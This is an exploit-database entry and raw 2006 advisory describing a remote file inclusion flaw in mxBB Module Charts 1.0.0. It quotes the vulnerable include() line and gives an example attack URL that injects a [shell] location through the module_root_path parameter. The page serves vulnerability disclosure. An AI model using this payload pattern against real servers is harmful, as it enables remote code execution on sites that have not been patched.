header-logo
Suggest Exploit
vendor:
mxBB Module Charts
by:
ajann
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: mxBB Module Charts
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: mxbb-module-charts
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mxBB Module Charts <= 1.0.0(module_root_path) Remote File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'module_root_path' parameter in 'charts_constants.php' script. A remote attacker can include arbitrary files from local resources and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to access local resources.
Source

Exploit-DB raw data:

*******************************************************************************************
# Title   :  mxBB Module Charts <= 1.0.0(module_root_path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.mx-system.com

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
include($module_root_path . 'language/lang_' . $language . '/lang_charts.' .  $phpEx);
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/modules/mx_charts/charts_constants.php?module_root_path=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-16]